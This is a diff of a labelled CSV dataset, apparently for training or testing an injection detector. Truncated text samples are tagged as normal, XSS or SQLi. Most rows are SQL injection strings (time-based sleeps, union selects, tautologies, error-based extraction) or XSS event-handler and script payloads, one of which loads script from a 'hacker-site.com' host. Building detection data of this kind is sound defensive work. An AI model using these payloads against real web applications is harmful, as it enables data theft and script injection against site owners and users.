Closeout: 60% off select cold-weather,0,normal,25917 +(sleep(5))--,2,SQLi,11346 +1'|| ( select 'lxpg' where 7390 = 7390 and 5556 = ,2,SQLi,18871 +"1 and row ( 6237,7469 ) > ( select count ( * ) ,co",2,SQLi,20616 +-1459' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5,2,SQLi,22375 +These illustrations are comparatively simple; it w,0,normal,25323 +"<li oncut=""alert(1)"" contenteditable>test</li>",1,XSS,4868 +"-8999"" where 2821 = 2821 union all select 2821,282",2,SQLi,21250 +<output id=x tabindex=1 ondeactivate=alert(1)></ou,1,XSS,2622 +"-4586 union all select 2068,2068,2068,2068--",2,SQLi,22407 +<s id=x tabindex=1 onactivate=alert(1)></s>,1,XSS,6712 +<form onpointermove=alert(1)>XSS</form>,1,XSS,3028 +"-4728"" ) ) as ndri where 3278 = 3278 or make_set (",2,SQLi,17291 +"<label onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,4105 +1 ) as iiku where 9466 = 9466,2,SQLi,20907 +"1"" ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ",2,SQLi,15834 +"<link onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,2024 +Where's the therapy center?,0,normal,23620 +globalThis[`al`+/ert/.source]`1`,1,XSS,9388 +<center onfocusout=alert(1) tabindex=1 id=x></cent,1,XSS,2687 +I'll select my tuxedo.,0,normal,24362 "<xss onkeydown=""alert(1)"" contenteditable style=di",1,XSS,72 -"&lt;SPAN DATASRC=\""#xss\"" DATAFLD=\""B\"" DATAFORMAT",1,XSS,1026 -1' in boolean mode ) or 7427 = dbms_pipe.receive_m,2,SQLi,14715 -"-8902 union all select 4339,4339,4339#",2,SQLi,12752 -"1%"" ) and ( select 2* ( if ( ( select * from ( sel",2,SQLi,13909 -"<IMG SRC=x oninvalid=""alert(String.fromCharCode(88",1,XSS,1190 -1' ) where 4750 = 4750 and exp ( ~ ( select * from,2,SQLi,22254 -declare @s varchar ( 200 ) select @s = 0x77616974 ,2,SQLi,11691 -"<colgroup onmousemove=""alert(1)"">test</colgroup>",1,XSS,3500 -1' ) waitfor delay '0:0:5' and ( 'peyv' like 'peyv,2,SQLi,17052 -"1%"" ) and extractvalue ( 7982,concat ( 0x5c,0x7171",2,SQLi,12792 -<dfn id=x tabindex=1 onfocus=alert(1)></dfn>,1,XSS,2710 -"1%"" ) ) ) order by 1--",2,SQLi,16465 -"<form oncut=""alert(1)"" contenteditable>test</form>",1,XSS,4243 -<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT,1,XSS,1360 -"-9736' or make_set ( 7311 = 2067,2067 ) and 'czdt'",2,SQLi,12932 -"<audio onerror=""javascript:alert(1)""><source>//INJ",1,XSS,9841 -1'+ ( select 'uqaf' where 7414 = 7414,2,SQLi,14107 -"-5235 ) or make_set ( 9354 = 9354,7185 )",2,SQLi,17264 -";';;!--"";<;XSS>;=&;{()}",1,XSS,1579 -"1"" where 3368 = 3368 and 9254 = ( select count ( *",2,SQLi,19279 -"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//",1,XSS,1510 -"{""id"":null,""firstName"":""Han Jie"",""lastName"":""Kwong",0,normal,27453 -1' ) rlike sleep ( 5 ) and ( 'qsub' like 'qsub,2,SQLi,18610 -"1%"" ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 )",2,SQLi,12781 -<dfn onpointerenter=alert(1)>XSS</dfn>,1,XSS,4113 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,20792 -1 ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ),2,SQLi,13943 -<bdo id=x tabindex=1 onactivate=alert(1)></bdo>,1,XSS,1846 --7187' or 4159 = 7465,2,SQLi,12244 --7648' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,12400 -"<li onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,7839 -"<bgsound onmouseover=""alert(1)"">test</bgsound>",1,XSS,6964 -1 ) ) ) and 8407 = ( select count ( * ) from gener,2,SQLi,13770 -"-4031"" ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,15701 -select * from users where id = '1' <@._ union sele,2,SQLi,12003 -<style>:target {color:red;}</style><spacer id=x st,1,XSS,4333 -constraint,0,normal,23131 -select * from users where id = 1 -1<@ union select,2,SQLi,11679 -Select your council.,0,normal,24869 -<form><textarea oninvalid=alert(1) required><input,1,XSS,3615 -"document.querySelector("".example"")",1,XSS,2109 -select ( case when ( 3681 = 5989 ) then 3681 else ,2,SQLi,14410 -"1"" ) ) procedure analyse ( extractvalue ( 9255,con",2,SQLi,19081 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--",2,SQLi,10779 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7774 -"-7006' where 6966 = 6966 union all select 6966,696",2,SQLi,18252 -Delete duplicates.,0,normal,22808 -1' ) ) as ypgz where 8704 = 8704,2,SQLi,12889 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5324 -1 ) as iqkf where 7780 = 7780,2,SQLi,17097 -;SELECT SLEEP(5); #,2,SQLi,11352 -<samp id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,4184 -Select a program to watch on TV.,0,normal,24047 -Select a topic I have a smelly green discharge I h,0,normal,25655 -It is important you select the right one for your ,0,normal,25965 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,20742 +"&lt;XML SRC=\""xsstest&#46;xml\"" ID=I&gt;&lt;/XML&g",1,XSS,1027 +"-3130 ) union all select 1741,1741,1741,1741,1741,",2,SQLi,14717 +"1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,12754 +1%' or 4411 = ( select count ( * ) from sysusers a,2,SQLi,13911 +"<IMG SRC=x onreset=""alert(String.fromCharCode(88,8",1,XSS,1191 +"1"" where 9919 = 9919",2,SQLi,22252 +"select * from users where id = 1 or "";["" or 1 = 1 ",2,SQLi,11693 +"<frame draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,3502 +1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105,2,SQLi,17054 +1'+ ( select kqac where 4362 = 4362 and 8312 = dbm,2,SQLi,12794 +<wbr onpointerdown=alert(1)>XSS</wbr>,1,XSS,2711 +1' ) and 3754 = ( select upper ( xmltype ( chr ( 6,2,SQLi,16467 +"<base onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,4245 +<SCRIPT> alert(“XSS”); </SCRIPT>,1,XSS,1361 +1%' and ( 3020 = 3020 ) *6703 and '%' = ',2,SQLi,12934 +<select autofocus onfocus=alert(1)>//INJECTX,1,XSS,9843 +"1%"" or 4915 = ( select count ( * ) from domain.dom",2,SQLi,14109 +1 ) ) ) and 5556 = ( select count ( * ) from all_u,2,SQLi,17266 +<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;,1,XSS,1580 +1 where 5099 = 5099 and 8312 = dbms_pipe.receive_m,2,SQLi,19277 +"<style TYPE=""text/javascript"">document.vulnerable=",1,XSS,1511 +Select a movie for a movie marathon.,0,normal,24103 +-3540 where 7302 = 7302 or 4493 = utl_inaddr.get_h,2,SQLi,18608 +"1"" and sleep ( 5 ) and ""tdid"" like ""tdid",2,SQLi,12783 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4115 +"1"" ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,20790 +1'+ ( select kfmv where 1679 = 1679,2,SQLi,13945 +"<video onmouseout=""alert(1)"">test</video>",1,XSS,1847 +"1"" ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,12246 +select case when 7426 = 6635 then 1 else null end-,2,SQLi,12402 +<ol onpointerup=alert(1)>XSS</ol>,1,XSS,7841 +<basefont onpointerenter=alert(1)>XSS</basefont>,1,XSS,6966 +"1"" where 2452 = 2452",2,SQLi,13772 +1' rlike ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,15703 +"admin"" ) or ( ""1"" = ""1""/*",2,SQLi,12005 +"<style>@keyframes x{}</style><li style=""animation-",1,XSS,4335 +into,0,normal,23128 +") union select * from information_schema.tables,",2,SQLi,11681 +1'+ ( select 'qsqs' where 9227 = 9227 waitfor dela,2,SQLi,18427 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3617 +"<map onmouseleave=""alert(1)"">test</map>",1,XSS,2110 +"-8614' ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,14412 +1'|| ( select 'baur' from dual where 9384 = 9384 o,2,SQLi,19079 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10781 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7776 +-9893' or 4747 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,18250 +Update settings.,0,normal,22805 +"1%' ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( '",2,SQLi,12891 +"<font onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5326 +1%' ) and ( select 2* ( if ( ( select * from ( sel,2,SQLi,17099 +#ERROR!,2,SQLi,11354 +<frameset onpointerleave=alert(1)>XSS</frameset>,1,XSS,4186 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18351 +select action for Chris.,0,normal,25652 +It is not recommended to select an ISP by price al,0,normal,25962 +"-5817' in boolean mode ) union all select 2391,239",2,SQLi,20740 "<object data=""data:text/html;base64,%(base64)s"">",1,XSS,637 -`'><script>\xE2\x80\x8Ajavascript:alert(513)</scri,1,XSS,8984 -Modify style.,0,normal,23038 -<code onpointerleave=alert(1)>XSS</code>,1,XSS,4513 -"<IMG SRC=x onsubmit=""alert(String.fromCharCode(88,",1,XSS,1194 +`'><script>\xE2\x80\xA8javascript:alert(512)</scri,1,XSS,8986 +"-2316%' union all select 8636,8636,8636,8636,8636,",2,SQLi,20046 +<footer id=x tabindex=1 ondeactivate=alert(1)></fo,1,XSS,4515 +"<IMG SRC=x onkeydown=""alert(String.fromCharCode(88",1,XSS,1195 "<style>@keyframes x{}</style><xss style=""animation",1,XSS,46 -"Everlane Women's Cashmere Crew, available in selec",0,normal,26208 -1' ) where 8118 = 8118,2,SQLi,17361 -Let's decide where to go for our adventure.,0,normal,23800 -1 ) ) and 3754 = ( select upper ( xmltype ( chr ( ,2,SQLi,13867 -"<spacer onmousedown=""alert(1)"">test</spacer>",1,XSS,6787 -<svg><table onload=alert(1)></table>,1,XSS,2964 -><script+src=https://www.googleadservices.com/page,1,XSS,9777 -Select the link.,0,normal,22885 -"<head onmousemove=""alert(1)"">test</head>",1,XSS,4516 -<button onBeforeDeactivate=javascript:alert(1)>,1,XSS,9582 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14268 -The premises from which he may select are fixed; m,0,normal,25395 -"<data draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,1976 -"1' and elt ( 9371 = 8882,8882 ) and 'vurh' = 'vurh",2,SQLi,22384 -1' ) as nmzp where 3794 = 3794 and 6510 = ( select,2,SQLi,20533 -1' ) as bihs where 4197 = 4197,2,SQLi,12604 -or '1' = '1'--,2,SQLi,11907 -"<nav onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,6890 -Insert your contact details.,0,normal,22566 -Select your purpose.,0,normal,24842 -"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,17655 -"1' ) where 6081 = 6081 union all select null,null,",2,SQLi,21262 -1'+ ( select kpso where 1226 = 1226 union all sele,2,SQLi,14913 -1'|| ( select 'sxya' where 3578 = 3578,2,SQLi,18738 +She'll select the appetizer.,0,normal,24440 +1 ) ) as npdl where 5796 = 5796 and 3707 = ( selec,2,SQLi,17363 +Select your dream vacation.,0,normal,24267 +1 ) and 6537 = dbms_pipe.receive_message ( chr ( 7,2,SQLi,13869 +"<embed onkeyup=""alert(1)"" contenteditable>test</em",1,XSS,6789 +"<tt draggable=""true"" ondrag=""alert(1)"">test</tt>",1,XSS,2965 +><script+src=https://accounts.google.com/o/oauth2/,1,XSS,9779 +Insert the form.,0,normal,22882 +<svg><set onrepeat=alert(1) attributename=x dur=1s,1,XSS,4518 +<button onBeforePaste=javascript:alert(1)>,1,XSS,9584 +"1 ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a",2,SQLi,14270 +The president can select appointees who align in t,0,normal,25392 +<mark id=x tabindex=1 ondeactivate=alert(1)></mark,1,XSS,1977 +Select mark.,0,normal,24663 +1%' ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ,2,SQLi,20531 +"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,12606 +"select * from users where id = 1 or 1#"". = 1 union",2,SQLi,11909 +<output onblur=alert(1) tabindex=1 id=x></output><,1,XSS,6892 +Plant some fresh flowers.,0,normal,22563 +Select your champion.,0,normal,24839 +The chart above highlights a select few names from,0,normal,25476 +1'+ ( select pepf where 5071 = 5071 or 2367 = ( se,2,SQLi,21260 +-7231 ) ) union all select 7639#,2,SQLi,14915 +1' in boolean mode ) or 6793 = ( select 6793 from ,2,SQLi,19164 "<a href=""javas\x08cript:javascript:alert(1)"" id=""f",1,XSS,433 -"<th onclick=""alert(1)"">test</th>",1,XSS,5168 -Here's how I select my seat every time I fly.,0,normal,26102 -"<h1 onpaste=""alert(1)"" contenteditable>test</h1>",1,XSS,1833 -1'+ ( select 'mdiu' where 4443 = 4443,2,SQLi,15931 -Select the right colors for the artwork.,0,normal,24188 -1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,22364 -ORDER BY 23--,2,SQLi,10265 +<image onpointerover=alert(1)>XSS</image>,1,XSS,5170 +His extensive knowledge of banking was displayed i,0,normal,26099 +<area onfocusout=alert(1) tabindex=1 id=x></area><,1,XSS,1834 +1'+ ( select 'wvqj' where 3709 = 3709,2,SQLi,15933 +Check values where possible.,0,normal,23381 +1' ) ) as jtmf where 3937 = 3937,2,SQLi,20258 +ORDER BY 25--,2,SQLi,10267 <style>:target {color: red;}</style><xss id=x styl,1,XSS,38 -1 ) as sdnd where 9472 = 9472,2,SQLi,14575 -Select the perfect outfit for a gathering.,0,normal,24031 -Select breakfast.,0,normal,24500 -1 rlike ( select ( case when ( 8314 = 5463 ) then ,2,SQLi,18308 -<image id=x tabindex=1 ondeactivate=alert(1)></ima,1,XSS,4594 +"1%"" rlike sleep ( 5 ) and ""%"" = """,2,SQLi,14577 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,17900 +Select soup.,0,normal,24497 +1'+ ( select 'pvej' where 4496 = 4496 and 6055 = c,2,SQLi,18306 +"<del ondblclick=""alert(1)"">test</del>",1,XSS,4596 "<script>Object.__noSuchMethod__ = Function,[{}][0]",1,XSS,714 `'><script>\xE2\x80\x84javascript:alert(1)</script,1,XSS,560 --1641'|| ( select 'jfnu' where 7682 = 7682 union a,2,SQLi,13255 --2154%' or 4144 = ( select upper ( xmltype ( chr (,2,SQLi,21520 -<hr id=x tabindex=1 onfocus=alert(1)></hr>,1,XSS,2336 -1' ) and 8635 = ( select count ( * ) from generate,2,SQLi,13092 -"<h1 onbeforecut=""alert(1)"" contenteditable>test</h",1,XSS,4538 --5320 where 8051 = 8051 or 5023 = ctxsys.drithsx.s,2,SQLi,12613 -Modify layout.,0,normal,22802 -<address id=x tabindex=1 onfocusin=alert(1)></addr,1,XSS,6132 -<dfn onfocusout=alert(1) tabindex=1 id=x></dfn><in,1,XSS,7003 -1' ) as vpop where 2528 = 2528 union all select nu,2,SQLi,13093 -1' ) ) or exp ( ~ ( select * from ( select concat ,2,SQLi,21889 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10438 -1' ) as jwvp where 5231 = 5231 and 8189 = ( select,2,SQLi,17907 -<p id=x tabindex=1 onactivate=alert(1)></p>,1,XSS,7433 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13018 -"1"" ) ) as puws where 7006 = 7006",2,SQLi,13880 -"<th oncopy=""alert(1)"" contenteditable>test</th>",1,XSS,3748 -"admin"" ) or ""1"" = ""1",2,SQLi,11601 -Redirect 302 /a.jpg http://victimsite.com/admin.as,1,XSS,1598 -1' ) as uytv where 7875 = 7875 or 7417 = ( select ,2,SQLi,21720 -"For example, if you tap to select one part of a ho",0,normal,26179 -1'+ ( select 'toec' where 5810 = 5810 and sleep ( ,2,SQLi,14642 -"-6642' ) where 3459 = 3459 union all select 3459,3",2,SQLi,19181 -end and ( ( 6874 = 6874,2,SQLi,14081 -alert&#x28;1&#x29,1,XSS,9373 -"{""id"":null,""firstName"":""Rohaida"",""lastName"":""Ibrah",0,normal,27028 -"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,17473 -"<bdo onkeydown=""alert(1)"" contenteditable>test</bd",1,XSS,4303 -<svg><tfoot onload=alert(1)></tfoot>,1,XSS,3007 -Filter your email messages.,0,normal,22550 -1' and 3707 = ( select count ( * ) from sysibm.sys,2,SQLi,13286 -Affiliated groups may select two members to vote a,0,normal,26403 -1' ) where 5307 = 5307,2,SQLi,17010 -<h1 onpointerleave=alert(1)>XSS</h1>,1,XSS,7524 -<animatemotion onpointerdown=alert(1)>XSS</animate,1,XSS,5831 -"By late February, more Yeezys were released throug",0,normal,26299 -"1"" ) ) ) and 8594 = ( select 8594 from pg_sleep ( ",2,SQLi,20641 -"<script a="">'>"" SRC=""http://www.securitycompass.co",1,XSS,1560 --7054 ) as gzvf where 9146 = 9146 or 3038 = 3038,2,SQLi,13314 -"1"" ) ) and 8407 = ( select count ( * ) from genera",2,SQLi,13529 -"1%"" or 7417 = ( select count ( * ) from sysibm.sys",2,SQLi,16311 -"1"" ) as hhxx where 3372 = 3372 or char ( 117 ) ||c",2,SQLi,17746 -1' ) and ( 3020 = 3020 ) *6703 and ( 'botl' like ',2,SQLi,21238 -<datalist id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,2108 -Select your label.,0,normal,24895 -Select your outcome.,0,normal,24878 -"admin"" or 1 = 1--",2,SQLi,11879 -"{""id"":null,""name"":""route actually""}",0,normal,27270 -"ORDER BY 1,SLEEP(5),3#",2,SQLi,10448 -"1"" ) ) ) or 8315 = ( select count ( * ) from sysib",2,SQLi,12562 -if ( 8574 = 7534 ) select 8574 else drop function ,2,SQLi,15864 -Select the movie.,0,normal,22834 -1%' or 2367 = ( select count ( * ) from rdb$fields,2,SQLi,13937 -javascript:document.location='http://www.google.co,1,XSS,7940 -1' ) ) or ( select 9173 from ( select count ( * ) ,2,SQLi,16106 -"-5573' ) union all select 2866,2866,2866,2866,2866",2,SQLi,17985 -"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,13533 -"<style>@keyframes x{}</style><option style=""animat",1,XSS,8028 -"1"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||",2,SQLi,19454 -Where's the bus stop?,0,normal,23499 -"-4728"" ) ) as ndri where 3278 = 3278 or make_set (",2,SQLi,17291 -<marguee/onstart=alert(1)>,1,XSS,9229 -admin' ) or '1' = '1'/*,2,SQLi,11886 +1' where 1623 = 1623,2,SQLi,13257 +1'+ ( select 'sqje' where 1634 = 1634 or exp ( ~ (,2,SQLi,20514 +"<element oncut=""alert(1)"" contenteditable>test</el",1,XSS,2337 +"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,13094 +"<IMG SRC=""javascript:alert('');"">",1,XSS,4540 +1 where 5691 = 5691 and ( select * from ( select (,2,SQLi,12615 +Delete old bookmarks.,0,normal,22799 +"<multicol onbeforecut=""alert(1)"" contenteditable>t",1,XSS,6134 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7005 +1'|| ( select 'jbgg' from dual where 1986 = 1986 u,2,SQLi,13095 +1' ) where 7007 = 7007 or 7427 = dbms_pipe.receive,2,SQLi,21887 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10440 +"1"" ) union all select null,null,null,null,null#",2,SQLi,17905 +"<figure onkeypress=""alert(1)"" contenteditable>test",1,XSS,7435 +"-1277"" ) where 6622 = 6622 or 3038 = 3038",2,SQLi,13020 +"select sleep ( 5 ) and ( ""zsjw"" like ""zsjw",2,SQLi,13882 +"<area onmouseover=""alert(1)"">test</area>",1,XSS,3750 +"select * from users where id = 1 or ""??"" or 1 = 1 ",2,SQLi,11603 +"exp/*<;XSS STYLE=';no\xss:noxss("";*//*"";);",1,XSS,1599 +1' and 5556 = ( select count ( * ) from all_users ,2,SQLi,21718 +"For it endured for fourteen years, and was just as",0,normal,26176 +-4023 or ( 8779 = 5716 ) *5716,2,SQLi,14644 +1 ) as nmlm where 9872 = 9872,2,SQLi,17811 +"1"" where 8734 = 8734",2,SQLi,14083 +eval(URL.slice(-8))>#alert(1),1,XSS,9375 +"{""id"":null,""firstName"":""Frank"",""lastName"":""Lay"",""s",0,normal,27025 +"1"" where 1203 = 1203 union all select null,null,nu",2,SQLi,17475 +"<shadow oncontextmenu=""alert(1)"">test</shadow>",1,XSS,4305 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3008 +Delete the expired coupons from your wallet.,0,normal,22968 +"1"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 )",2,SQLi,13288 +"After that, only a select group of websites, inclu",0,normal,26400 +1' ) ) as mjps where 2179 = 2179 union all select ,2,SQLi,17012 +"<IMG SRC=""jav ascript:alert('');"">",1,XSS,7526 +"<footer onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,5833 +Call Me By Your Name is currently playing in selec,0,normal,26296 +"{""id"":null,""firstName"":""Khairuddin"",""lastName"":""Ad",0,normal,26887 +"<script>document.write(""<SCRI"");</SCRIPT>PT SRC=""h",1,XSS,1561 +1' ) and 8514 = ( select count ( * ) from domain.d,2,SQLi,13316 +1' ) and ( select 2* ( if ( ( select * from ( sele,2,SQLi,13531 +"-4287%"" ) ) union all select 9074,9074,9074,9074,9",2,SQLi,16313 +if ( 8182 = 3225 ) select 8182 else drop function ,2,SQLi,20536 +"{""id"":null,""firstName"":""Kee Hwee"",""lastName"":""Tan""",0,normal,26850 +"document.querySelector("".example"")",1,XSS,2109 +Select your image.,0,normal,24892 +Select your impact.,0,normal,24875 +""" or sleep ( __TIME__ ) #",2,SQLi,11881 +"{""id"":null,""name"":""Steller’s Sea Cow""}",0,normal,27268 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10450 +1 or ( select * from ( select ( sleep ( 5 ) ) ) yd,2,SQLi,12564 +"1 ) union all select null,null,null,null--",2,SQLi,15866 +1 ) ) as llnm where 6510 = 6510 and 3202 = like ( ,2,SQLi,20410 +( case when 6398 = 6398 then 1 else null end ),2,SQLi,13939 +<svg><map onload=alert(1)></map>,1,XSS,7942 +( select ( case when ( 6035 = 9882 ) then 6035 els,2,SQLi,16108 +"1"" ) or ( select 2* ( if ( ( select * from ( selec",2,SQLi,17983 +"-1263"" ) or 9323 = 9323#",2,SQLi,13535 +"<style>@keyframes x{}</style><bgsound style=""anima",1,XSS,8030 +-4803%' ) ) or 8571 = 8571--,2,SQLi,18923 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,20359 +"1"" ) and ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,17293 +<marquee onstart=alert(1)>,1,XSS,9231 +"select * from users where id = 1 or ""@?"" or 1 = 1 ",2,SQLi,11888 "<DIV STYLE=""background-image: url(javascript:javas",1,XSS,761 "&lt;STYLE&gt;BODY{-moz-binding&#58;url(\""http&#58;",1,XSS,987 -1 where 5691 = 5691 and ( select * from ( select (,2,SQLi,12615 -1'+ ( select 'rpbx' where 6748 = 6748 and elt ( 42,2,SQLi,17984 +1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,12617 +1' ) ) ) union all select null--,2,SQLi,17982 <img src=x:alert(alt) onerror=eval(src) alt=0>,1,XSS,325 -"-4515"" ) or elt ( 4545 = 2509,2509 ) and ( ""lglx"" ",2,SQLi,18122 -Select a movie for our movie night.,0,normal,24203 -ORDER BY 4--,2,SQLi,10246 --2745 ) ) as aywp where 9735 = 9735 or 5903 = ( 'q,2,SQLi,16680 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11736 -"-1588%"" ) ) ) or 1 group by concat ( 0x7171706a71,",2,SQLi,13031 -<noscript id=x tabindex=1 onfocusin=alert(1)></nos,1,XSS,1786 -<set onpointerover=alert(1)>XSS</set>,1,XSS,4383 -"Some may select charitable objectives, and good lu",0,normal,25533 -\xE2\x81\x9Fjavascript:javascript:alert(1),1,XSS,9477 -1 ) as wype where 6608 = 6608 or 8315 = ( select c,2,SQLi,19888 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,12647 -"1"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) -",2,SQLi,15322 -select ( case when ( 5322 = 6200 ) then 5322 else ,2,SQLi,15699 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,13426 -"{""id"":null,""firstName"":""William"",""lastName"":""Cheng",0,normal,27160 -"1"" or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,15013 -"1"" ) where 6236 = 6236 or 8514 = benchmark ( 50000",2,SQLi,15235 -"1"" ) and 9660 = ( select count ( * ) from all_user",2,SQLi,17255 -<dl onpointerenter=alert(1)>XSS</dl>,1,XSS,7408 -"1, ( select ( case when ( 6750 = 6750 ) then 1 els",2,SQLi,12545 -"<summary onkeypress=""alert(1)"" contenteditable>tes",1,XSS,7314 -"<label onmouseout=""alert(1)"">test</label>",1,XSS,2649 -<u onpointerout=alert(1)>XSS</u>,1,XSS,2587 -"1%"" ) union all select null--",2,SQLi,14329 -",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1",2,SQLi,11010 -"<ul onkeydown=""alert(1)"" contenteditable>test</ul>",1,XSS,3183 -"select * from users where id = 1 or "" ) ,"" or 1 = ",2,SQLi,11673 -<element id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,4804 -<frame onpointermove=alert(1)>XSS</frame>,1,XSS,4219 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5693 -word1,0,normal,26535 -1 or sleep ( 5 ) # tdgb,2,SQLi,12780 -alert&#40;1&#41,1,XSS,9372 --5534 or 1983 = 5721#,2,SQLi,13592 -<input onblur=alert(1) id=x><input autofocus>,1,XSS,7379 -"<article draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,1755 -"Now, we may select any definite quantity of work w",0,normal,25856 -"UNION ALL SELECT 1,2,3,4,5,6,7#",2,SQLi,10539 -"<span onmouseleave=""alert(1)"">test</span>",1,XSS,5373 -1 ) ) ) or 1022 = ( select count ( * ) from all_us,2,SQLi,15546 --4768'|| ( select 'dded' from dual where 6499 = 64,2,SQLi,20398 -"<;XSS STYLE="";xss:expression(alert(';XSS';))"";>;",1,XSS,1614 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5830 -"1%"" ) ) ) and 6414 = ( select count ( * ) from rdb",2,SQLi,21469 -"Select the account you just added and press ""A"" on",0,normal,25601 -1 ) as tngy where 8956 = 8956 rlike ( select ( cas,2,SQLi,18606 -"<style>@keyframes x{}</style><main style=""animatio",1,XSS,2016 -"Select Part Finder, which has a screw as its icon.",0,normal,25615 -An act of 1887 had amended the provisions of the W,0,normal,26374 -Filter calls.,0,normal,23024 -"<small onmousemove=""alert(1)"">test</small>",1,XSS,5757 +Do you hate how sharing from a widescreen / high r,0,normal,26504 +Select the perfect angle for the shot.,0,normal,24200 +ORDER BY 6--,2,SQLi,10248 +"-1844"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,16682 +select * from users where id = '1' + @ ( 1 ) union,2,SQLi,11738 +( 2329 = 4209 ) *1,2,SQLi,13033 +"<dd onmouseout=""alert(1)"">test</dd>",1,XSS,1787 +<style>:target {color:red;}</style><audio id=x sty,1,XSS,4385 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,22137 +javascript:alert(1),1,XSS,9479 +"iif ( 5257 = 5257,1,1/0 )",2,SQLi,19886 +1' ) where 9221 = 9221 and ( select 2* ( if ( ( se,2,SQLi,12649 +1'|| ( select 'ymac' from dual where 9268 = 9268 o,2,SQLi,15324 +"-4031"" ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,15701 +-9122 ) as sdlg where 1546 = 1546 union all select,2,SQLi,13428 +)) waitfor delay '0:0:20' /*,2,SQLi,22492 +1'|| ( select 'aojt' from dual where 8499 = 8499,2,SQLi,15015 +1 ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 ,2,SQLi,15237 +select sleep ( 5 ) and ( ( 'wyvx' = 'wyvx,2,SQLi,17257 +<data onpointerenter=alert(1)>XSS</data>,1,XSS,7410 +1'|| ( select 'noik' from dual where 9851 = 9851,2,SQLi,12547 +"<blockquote draggable=""true"" ondrag=""alert(1)"">tes",1,XSS,7316 +<u id=x tabindex=1 onactivate=alert(1)></u>,1,XSS,2650 +"<applet draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2588 +"1%"" ) ) ) and 3754 = ( select upper ( xmltype ( ch",2,SQLi,14331 +",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1",2,SQLi,11012 +<font onpointerleave=alert(1)>XSS</font>,1,XSS,3185 +"select * from users where id = 1 or 1#""? union sel",2,SQLi,11675 +"<q onmousedown=""alert(1)"">test</q>",1,XSS,4806 +"<big onmousemove=""alert(1)"">test</big>",1,XSS,4221 +<bgsound onpointerover=alert(1)>XSS</bgsound>,1,XSS,5695 +where,0,normal,26532 +"1%"" ) ) ) and 5556 = ( select count ( * ) from all",2,SQLi,12782 +alert&lpar;1&rpar;,1,XSS,9374 